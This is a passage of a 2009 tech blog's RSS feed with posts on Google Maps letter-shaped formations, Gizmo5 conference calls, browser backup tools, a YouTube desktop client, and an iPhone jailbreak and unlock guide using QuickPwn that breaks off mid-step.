href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/teamviewer-brings-more-faster-messaging-presentations-in-version-41/feed/</wfw:commentRss> <slash:comments>7</slash:comments> </item> <item><title>Google Maps Typography</title><link>http://www.honeytechblog.com/google-maps-typography/</link> <comments>http://www.honeytechblog.com/google-maps-typography/#comments</comments> <pubDate>Sun, 26 Apr 2009 17:05:27 +0000</pubDate> <dc:creator>Sakib Mahmud</dc:creator> <category><![CDATA[Blogroll]]></category> <category><![CDATA[NewsTech]]></category> <category><![CDATA[google]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[Alphabetic]]></category> <category><![CDATA[apps]]></category> <category><![CDATA[Google Maps Typography]]></category> <category><![CDATA[maps]]></category> <category><![CDATA[Typography]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/google-maps-typography/</guid> <description><![CDATA[Google Maps &#8212; it has lots of features but someone discovered A-Z using Google Maps. It&#8217;s totally splendid where you will see lots of English characters in Google Maps and it&#8217;s called Google Maps Typography. Developer says, &#8220;Over the course of several months beginning October 2008 to April 2009 I&#8217;ve spent some of my spare [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fgoogle-maps-typography%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22Google%20Maps%20Typography%22%20%7D);"></div><p><img
style="max-width: 800px;" src="http://www.honeytechblog.com/wp-content/uploads/2009/04/gmaps.jpg" alt="gmaps Google Maps Typography"  title="Google Maps Typography photo" /></p><p><a
href="http://maps.google.com">Google Maps</a> &#8212; it has lots of features but someone discovered <a
href="http://rhettdashwood.com.au/#16575">A-Z using Google Maps</a>. It&#8217;s totally splendid where you will see lots of English characters in Google Maps and it&#8217;s called <a
href="http://rhettdashwood.com.au/#16575">Google Maps Typography</a>. Developer says, &#8220;Over the course of several months beginning October 2008 to April 2009 I&#8217;ve spent some of my spare time between commercial projects searching Google Maps hoping to discover land formations or buildings resembling letter forms. These are the results of my findings limited within the state of Victoria, Australia.&#8221;. You can track by clicking at <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-36.889918,145.18012&amp;spn=0.041257,0.071497&amp;t=k&amp;z=14" target="_blank">a</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.742511,147.652913&amp;spn=0.005099,0.008937&amp;t=k&amp;z=17" target="_blank">b</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.838233,145.031877&amp;spn=0.001273,0.002234&amp;t=k&amp;z=19" target="_blank">c</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-38.313486,145.14051&amp;spn=0.00253,0.004469&amp;t=k&amp;z=18" target="_blank">d</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.840074,144.893757&amp;spn=0.001273,0.002234&amp;t=k&amp;z=19" target="_blank">e</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.801918,143.933687&amp;spn=0.005095,0.008937&amp;t=k&amp;z=17" target="_blank">f</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-38.065004,145.146453&amp;spn=0.010153,0.017874&amp;t=k&amp;z=16" target="_blank">g</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.961331,145.095092&amp;spn=0.001271,0.002234&amp;t=k&amp;z=19" target="_blank">h</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.840284,147.83268&amp;spn=0.002546,0.004469&amp;t=k&amp;z=18" target="_blank">i</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.81962,144.965056&amp;spn=0.001273,0.002234&amp;t=k&amp;z=19" target="_blank">j</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.00634,145.897472&amp;spn=0.010298,0.017874&amp;t=k&amp;z=16" target="_blank">k</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-38.056937,142.436392&amp;spn=0.005077,0.008937&amp;t=k&amp;z=17" target="_blank">l</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.893389,145.143629&amp;spn=0.001272,0.002234&amp;t=k&amp;z=19" target="_blank">m</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.993491,141.721444&amp;spn=0.005082,0.008937&amp;t=k&amp;z=17" target="_blank">n</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.819921,144.983311&amp;spn=0.005094,0.008937&amp;t=k&amp;z=17" target="_blank">o</a>, <a
href="http://www.google.com/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.663457,142.560847&amp;spn=0.00507,0.007811&amp;t=k&amp;z=17" target="_blank">p</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-36.05125,144.192317&amp;spn=0.010426,0.017874&amp;t=k&amp;z=16" target="_blank">q</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-36.635573,142.958972&amp;spn=0.010348,0.017874&amp;t=k&amp;z=16" target="_blank">r</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-38.207491,145.387305&amp;spn=0.005067,0.008937&amp;t=k&amp;z=17" target="_blank">s</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-38.045261,142.326154&amp;spn=0.002539,0.004469&amp;t=k&amp;z=18" target="_blank">t</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.738557,145.511974&amp;spn=0.005099,0.008937&amp;t=k&amp;z=17" target="_blank">u</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.842057,144.99905&amp;spn=0.001273,0.002234&amp;t=k&amp;z=19" target="_blank">v</a>, <a
href="http://www.google.com/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.897233,144.745823&amp;spn=0.002527,0.003905&amp;t=k&amp;z=18" target="_blank">w</a>, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-34.258919,142.058415&amp;spn=0.021317,0.035748&amp;t=k&amp;z=15" target="_blank">x</a>, y, <a
href="http://maps.google.com.au/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;msid=107269306892490480692.000459cc1b231fda86744&amp;ll=-37.814734,144.996614&amp;spn=0.001273,0.002234&amp;t=k&amp;z=19" target="_blank">z.</a> Enjoy.</p><div
class="zemanta-pixie"><img
class="zemanta-pixie-img" src="http://img.zemanta.com/pixy.gif?x-id=4f017167-833b-8b61-a565-ea6bb56fdc35" alt=" Google Maps Typography"  title="Google Maps Typography photo" /></div>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/google-maps-brings-webcam-layer-in-maps/" rel="bookmark" title="April 17, 2009">Google Maps Brings Webcam Layer In Maps</a></li><li><a
href="http://www.honeytechblog.com/google-maps-for-nokiasymbian-s60-and-windows-mobile-phone/" rel="bookmark" title="September 15, 2008">Google Maps for Nokia/Symbian S60 and Windows Mobile phone</a></li><li><a
href="http://www.honeytechblog.com/color-filtering-system-in-google-images/" rel="bookmark" title="April 10, 2009">Color Filtering System In Google Images</a></li><li><a
href="http://www.honeytechblog.com/earthquake-in-laquila-italy-see-imagery-in-google-earth/" rel="bookmark" title="April 10, 2009">Earthquake In L&#8217;Aquila, Italy &#8212; See Imagery In Google Earth</a></li><li><a
href="http://www.honeytechblog.com/google-showing-gps-function-in-search-engine/" rel="bookmark" title="April 7, 2009">Google Showing GPS Function In Search Engine</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/google-maps-typography/feed/</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Make Free Calls By Using Gizmo5</title><link>http://www.honeytechblog.com/make-free-calls-by-using-gizmo5/</link> <comments>http://www.honeytechblog.com/make-free-calls-by-using-gizmo5/#comments</comments> <pubDate>Mon, 20 Apr 2009 16:10:48 +0000</pubDate> <dc:creator>Sakib Mahmud</dc:creator> <category><![CDATA[How to]]></category> <category><![CDATA[Internet]]></category> <category><![CDATA[applications]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[gizmo5]]></category> <category><![CDATA[mobile]]></category> <category><![CDATA[VoIP]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/make-free-calls-by-using-gizmo5/</guid> <description><![CDATA[Gizmo5 offering free conference calls and it&#8217;s well known VoIP service provider, also giving free conference calling service to customers. In before it has good quality and nowadays it&#8217;s voice quality going down. In last week, they extended more features as a free conference call offer.
By using their service, you can directly call to your [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fmake-free-calls-by-using-gizmo5%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22Make%20Free%20Calls%20By%20Using%20Gizmo5%22%20%7D);"></div><p><a
href="http://www.gizmo5.com/"><img
style="max-width: 800px; float: right; margin-top: 10px; margin-bottom: 10px; margin-left: 10px;" src="http://www.honeytechblog.com/wp-content/uploads/2009/04/gizmo5-logo.png" alt="gizmo5 logo Make Free Calls By Using Gizmo5"  title="Make Free Calls By Using Gizmo5 photo" />Gizmo5</a> offering free conference calls and it&#8217;s well known VoIP service provider, also giving free conference calling service to customers. In before it has good quality and nowadays it&#8217;s voice quality going down. In last week, they extended more features as a <a
href="http://gizmo5.com/pc/products/features/conference-calling/">free conference call offer</a>.</p><p>By using their service, you can directly call to your contacts cell phone and connect them for conference. At anytime, online you can make conference and it can smoothly handle 2 to 10 people spontaneously. PC to PC call are always free but when you&#8217;re moving out of PC you can try their country basis <a
href="http://gizmo5.com/pc/network/callout-rates/">call rates</a> or <a
href="http://gizmo5.com/pc/products/features/callout-credit/">calling credit</a> features and maybe it will be better for you.</p><p>Gizmo5 has Windows, Linux and Mac version and all are free for you and also they have Nokia Tablet &#8212; where you can get your desired and preferred applications for your mobile phone.</p><div
class="zemanta-pixie"><img
class="zemanta-pixie-img" src="http://img.zemanta.com/pixy.gif?x-id=abbdbf16-23a7-89bc-a9ca-7757c80d729a" alt=" Make Free Calls By Using Gizmo5"  title="Make Free Calls By Using Gizmo5 photo" /></div>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/twitter-connect-brings-social-connect-like-as-facebook-google/" rel="bookmark" title="April 18, 2009">Twitter Connect Brings Social Connect Like As Facebook, Google</a></li><li><a
href="http://www.honeytechblog.com/all-in-one-super-twitter-desktop-application/" rel="bookmark" title="April 26, 2009">All In One Super Twitter Desktop Application</a></li><li><a
href="http://www.honeytechblog.com/exploit-of-jajah-webtelephony-spoil-any-phone-balance/" rel="bookmark" title="February 15, 2007">Exploit of JAJAH WebTelephony (Spoil any phone balance)</a></li><li><a
href="http://www.honeytechblog.com/6-super-backup-applications-for-windows-and-mac/" rel="bookmark" title="April 26, 2009">6 Super Backup Applications For Windows and Mac</a></li><li><a
href="http://www.honeytechblog.com/use-your-nokia-handset-as-credit-card/" rel="bookmark" title="April 27, 2009">Use Your Nokia Handset As Credit Card</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/make-free-calls-by-using-gizmo5/feed/</wfw:commentRss> <slash:comments>5</slash:comments> </item> <item><title>How To Backup Your Browser&#8217;s Data</title><link>http://www.honeytechblog.com/how-to-backup-your-browsers-data/</link> <comments>http://www.honeytechblog.com/how-to-backup-your-browsers-data/#comments</comments> <pubDate>Sun, 19 Apr 2009 16:12:26 +0000</pubDate> <dc:creator>Sakib Mahmud</dc:creator> <category><![CDATA[Firefox hacks]]></category> <category><![CDATA[How to]]></category> <category><![CDATA[Internet]]></category> <category><![CDATA[Tips & twiks]]></category> <category><![CDATA[applications]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[software]]></category> <category><![CDATA[Automattic]]></category> <category><![CDATA[Browser Apps]]></category> <category><![CDATA[Browser's Data]]></category> <category><![CDATA[Firefox]]></category> <category><![CDATA[Internet Explorer]]></category> <category><![CDATA[mozilla]]></category> <category><![CDATA[Opera]]></category> <category><![CDATA[Safari]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/how-to-backup-your-browsers-data/</guid> <description><![CDATA[I&#8217;m using Firefox, Google Chrome, Flock, Opera, Internet Explorer. Nowadays, it&#8217;s quite harder to taking regular backup after using any browser. Even when you&#8217;re working &#8212; sometimes it&#8217;s showing your browser crash notifications, then you have to lost everything and note that reports will not bring you back your data. But with using some small [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fhow-to-backup-your-browsers-data%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22How%20To%20Backup%20Your%20Browser%27s%20Data%22%20%7D);"></div><p>I&#8217;m using <a
href="www.mozilla.com/firefox/">Firefox</a>, <a
href="www.google.com/chrome%20" target="_blank">Google Chrome</a>, <a
href="http://flock.com" target="_blank">Flock</a>, <a
href="http://">Opera</a>, <a
href="http://www.microsoft.com/windows/downloads/ie/getitnow.msp">Internet Explorer</a>. Nowadays, it&#8217;s quite harder to taking regular backup after using any browser. Even when you&#8217;re working &#8212; sometimes it&#8217;s showing your browser crash notifications, then you have to lost everything and note that reports will not bring you back your data. But with using some small free tools, you can save your bookmarks, , history, settings, caches &#8212; the browser doesn&#8217;t matter. Matter is, when you need to get back, when you will lost, get it again? Let me show you some cools utility which may makes your life more easier.</p><p><a
href="http://www.download.com/8301-2007_4-10050278-12.html?part=rss&amp;subj=news&amp;tag=2547-1_3-0-20">Google Chrome Backup</a>: This applications will save your bookmarks and settings automatically and we know Google Chrome has no extensions like a Mozilla Firefox browser. Also you can create mufti user profiles and anytime switch between then instantly.</p><p><a
href="http://mozbackup.jasnapaka.com/">Mozbackup</a>: An small cross Mozilla backup utility which will take backup of your bookmarks, mails, contacts, history, extensions cache&#8217;s too. It&#8217;s working for Firefox and Flocks and some Mozilla based browsers supporting too. Also lots of firefox extensions available on web, later we will talk more about it.<a
href="http://mac.softpedia.com/get/Internet-Utilities/Safari-Backup-and-Restore.shtml"><img
style="max-width: 800px; float: right; margin-top: 10px; margin-bottom: 10px; margin-left: 10px;" src="http://www.honeytechblog.com/wp-content/uploads/2009/04/safari.jpg" alt="safari How To Backup Your Browsers Data" width="151" height="155" title="How To Backup Your Browsers Data photo" /></a></p><p><a
href="http://mac.softpedia.com/get/Internet-Utilities/Safari-Backup-and-Restore.shtml">Safari Backup And Restore</a>: This applications working on <a
href="http://support.apple.com/kb/HT2980#saf">mac operating system</a> and it will take your bookmarks backup and a great tools which will do all things automatically.</p><p><a
href="http://www.backsettings.com/internet-explorer-backup.html">BackRex Internet Explorer Backup</a>: If you&#8217;re Internet Explorer user, you can take backup and restore your files by using this tools. It will manage your favorites, history, proxy setting, fonts and auto complete password and cookies too.  It&#8217;s supporting IE6, IE 7 versions.</p><p><a
href="http://my.opera.com/VJgamer/blog/operafly">OperaFly</a>: If you&#8217;re Opera Browser&#8217;s user you can try this tools. This is an official backup tools for opera browser and you can pre-schedule the backup times, automatically it will care of your contents, data &#8211; when you&#8217;re closing the browsers.</p><div
class="zemanta-pixie"><img
class="zemanta-pixie-img" src="http://img.zemanta.com/pixy.gif?x-id=6f43f56f-4ba1-8232-957b-c413afd5343b" alt=" How To Backup Your Browsers Data"  title="How To Backup Your Browsers Data photo" /></div>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/how-to-backup-your-bookmarks-with-free-bookmark-manager/" rel="bookmark" title="September 2, 2009">How to backup your bookmarks with free bookmark manager</a></li><li><a
href="http://www.honeytechblog.com/20-firefox-add-ons-you-shouldntt-use/" rel="bookmark" title="April 30, 2009">20 Firefox Add-ons You Shouldnt&#8217;t Use</a></li><li><a
href="http://www.honeytechblog.com/features-behind-google-chrome-why-google-is-building-a-browser/" rel="bookmark" title="September 3, 2008">Features behind Google Chrome &#8211; why google is building a browser ?</a></li><li><a
href="http://www.honeytechblog.com/20-applications-freeware-utility-software-try-atleast-once/" rel="bookmark" title="May 1, 2009">20+ Applications, Freeware, Utility Software &#8212; Try Atleast Once</a></li><li><a
href="http://www.honeytechblog.com/mozbackup-mozilla-backup-143/" rel="bookmark" title="July 25, 2007">MozBackup (Mozilla Backup) 1.4.3</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/how-to-backup-your-browsers-data/feed/</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>Enjoy Youtube Video From Desktop</title><link>http://www.honeytechblog.com/wpf-based-youtube-desktop-client-for-widnows/</link> <comments>http://www.honeytechblog.com/wpf-based-youtube-desktop-client-for-widnows/#comments</comments> <pubDate>Sun, 19 Apr 2009 15:27:01 +0000</pubDate> <dc:creator>Sakib Mahmud</dc:creator> <category><![CDATA[How to]]></category> <category><![CDATA[Internet]]></category> <category><![CDATA[applications]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[web2.0]]></category> <category><![CDATA[youtube]]></category> <category><![CDATA[apps]]></category> <category><![CDATA[sprink]]></category> <category><![CDATA[windows 7]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/wpf-based-youtube-desktop-client-for-widnows/</guid> <description><![CDATA[Sprink is a mini Youtube Desktop Applications which will brings video contents from Youtube web server to your desktop. Based on your search you can see relevant video list and choose anyone , instantly that will run on your computer. This mini applications working anytime &#8212; such as you&#8217;re working on word, excel or making [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fwpf-based-youtube-desktop-client-for-widnows%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22Enjoy%20Youtube%20Video%20From%20Desktop%22%20%7D);"></div><p><img
style="max-width: 800px;" src="http://www.honeytechblog.com/wp-content/uploads/2009/04/sprink.png" alt="sprink Enjoy Youtube Video From Desktop"  title="Enjoy Youtube Video From Desktop photo" /></p><p>Sprink is a mini <a
href="http://www.redmondpie.com/downloadscenter/Sprink%200.677.zip">Youtube Desktop Applications</a> which will brings video contents from <a
href="http://www.youtube.com" target="_blank">Youtube</a> web server to your desktop. Based on your search you can see relevant video list and choose anyone , instantly that will run on your computer. This mini applications working anytime &#8212; such as you&#8217;re working on word, excel or making slide show, on the same time you can see side by side youtube video in action on your screen. If you would like, you can setup random youtube video or you missed the highlights of last nights cricket match&#8217;s or checkout any exclusive episode of Discovery channels from your desktop.</p><p>To run this applications in your PC, reqired applications are:</p><ul><li>Microsoft Windows 7 Beta (from Build 7000 &#8211; Build 7106)</li><li>Microsoft Windows Vista SP1 or above</li><li><a
href="http://www.microsoft.com/downloads/details.aspx?FamilyID=AB99342F-5D1A-413D-8319-81DA479AB0D7&amp;displaylang=en" target="_blank">.NET Framework 3.5 SP1</a></li><li><a
href="http://get.adobe.com/flashplayer/" target="_blank">Adobe Flash Player</a></li></ul><p>Developer also informed that &#8220;in couple of months they will release more features, such as Integration with Windows 7 taskbar, Ability to mark videos as favorite right from the client, Support for other video service providers like MSN Video, Vimeo etc.&#8221; We will updates more about it &#8212; it&#8217;s awesome ways to enjoy youtube without visiting youtube.com directly.</p><p><img
style="max-width: 800px;" src="http://www.honeytechblog.com/wp-content/uploads/2009/04/sprink3dview-thumb.png" alt="sprink3dview thumb Enjoy Youtube Video From Desktop"  title="Enjoy Youtube Video From Desktop photo" /></p>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/facebook-will-share-details-about-facebook-verified-apps/" rel="bookmark" title="April 19, 2009">Facebook Will Share Details About Facebook Verified Apps</a></li><li><a
href="http://www.honeytechblog.com/all-in-one-super-twitter-desktop-application/" rel="bookmark" title="April 26, 2009">All In One Super Twitter Desktop Application</a></li><li><a
href="http://www.honeytechblog.com/30-essential-free-adobe-air-applications/" rel="bookmark" title="April 24, 2009">30+ Essential Free Adobe AIR Applications</a></li><li><a
href="http://www.honeytechblog.com/zimbra-desktop-email-client-10-get-it-free/" rel="bookmark" title="April 30, 2009">Zimbra Desktop Email Client 1.0 (Get It Free)</a></li><li><a
href="http://www.honeytechblog.com/youtube-and-flv-player-for-windows-mobile/" rel="bookmark" title="June 15, 2008">YouTube and FLV Player for windows mobile</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/wpf-based-youtube-desktop-client-for-widnows/feed/</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>How to upgrade / unlock your iPhone in 15 minutes</title><link>http://www.honeytechblog.com/how-to-upgrade-unlock-your-iphone-in-15-minutes/</link> <comments>http://www.honeytechblog.com/how-to-upgrade-unlock-your-iphone-in-15-minutes/#comments</comments> <pubDate>Sun, 29 Mar 2009 09:25:03 +0000</pubDate> <dc:creator>Honey Singh</dc:creator> <category><![CDATA[How to]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[NewsTech]]></category> <category><![CDATA[Reviews]]></category> <category><![CDATA[Shortcuts]]></category> <category><![CDATA[Stuff]]></category> <category><![CDATA[Tips & twiks]]></category> <category><![CDATA[apple]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[iTunes]]></category> <category><![CDATA[iphone]]></category> <category><![CDATA[iphone 3G]]></category> <category><![CDATA[mobile]]></category> <category><![CDATA[free]]></category> <category><![CDATA[Free Unlock Codes]]></category> <category><![CDATA[hack]]></category> <category><![CDATA[QuickPwn]]></category> <category><![CDATA[tricks]]></category> <category><![CDATA[unlock]]></category> <category><![CDATA[upgrade]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/?p=3146</guid> <description><![CDATA[In this tutorial we discuss about the easiest method to jailbreak your iPhone into latest 2.2.1 firmware release by the apple.QuickPwn 2.2.5 is the tools that helps in upgrading, jail breaking, and unlocking your Apple iPhone to run a free flow new firmware.Note:All the downloadable files are available at the end of the post.Follow the [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fhow-to-upgrade-unlock-your-iphone-in-15-minutes%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22How%20to%20upgrade%20%2F%20unlock%20your%20iPhone%20in%2015%20minutes%22%20%7D);"></div><p>In this tutorial we discuss about the easiest method to jailbreak your iPhone into latest 2.2.1 firmware release by the apple.QuickPwn 2.2.5 is the tools that helps in upgrading, jail breaking, and unlocking your Apple iPhone to run a free flow new firmware.<b>Note:</b>All the downloadable files are available at the end of the post.<img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="upgraded-unlocked-iphone" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/upgradedunlockediphone.jpg" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/upgradedunlockediphone.jpg" alt="upgraded-unlocked-iphone" border="0" width="505" height="380" /></p><p><img
src="http://cdn.honeytechblog.com/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" mce_src="http://cdn.honeytechblog.com/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" alt="trans How to upgrade / unlock your iPhone in 15 minutes" class="mceWPmore mceItemNoResize" title="More..." /></p><p>Follow the procedure:</p><ol><li>Start your iTunes and connect your iPhone into it.The it will ask to upgrade your iPhone for firmware to 2.2.1.<a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009182022.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009182022.png"><img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="28-03-2009 18-20-22" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009182022-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009182022-thumb.png" alt="28-03-2009 18-20-22" border="0" width="510" height="320" /></a></li><li>Freely upgrade your iPhone from iTunes.(Even if you are using previous jailbreak <a
class="zem_slink" title="Upgrade" rel="wikipedia" href="http://en.wikipedia.org/wiki/Upgrade" mce_href="http://en.wikipedia.org/wiki/Upgrade">firmware upgrade</a> it as it will be unlocked later by QuickPwn).QuickPwn changes the firmware settings and doesn’t actually upgrade your iPhone so this process is quit necessary.<a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091822016.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091822016.png"><img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="28-03-2009 18-22-01" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009182201-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009182201-thumb.png" alt="28-03-2009 18-22-01" border="0" width="509" height="320" /></a></li><li>After the successful upgrade,You iPhone will be unlocked and here starts the game.<a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091827204.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091827204.png"><img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="28-03-2009 18-27-20" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009182720-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009182720-thumb.png" alt="28-03-2009 18-27-20" border="0" width="504" height="317" /></a></li><li>Get the latest version of QuickPwn 2.2.5 <a
class="downloadlink" href="http://www.honeytechblog.com/download/QuickPwn-225-2.zip" title="Version2.25 downloaded 338 times" >QuickPwn for Windows (338)</a> or <a
class="downloadlink" href="http://www.honeytechblog.com/download/QuickPwn_2.2.5.dmg" title="Version2.25 downloaded 186 times" >QuickPwn for Mac (186)</a>.</li><li>Simply extract the file into a folder and launch the QuickPwn 2.2.5 program.It will ask for connecting your iPhone into your computer via the USB cable. Note:As soon as the blue arrow button glows, click it.<a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091829224.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091829224.png"><img
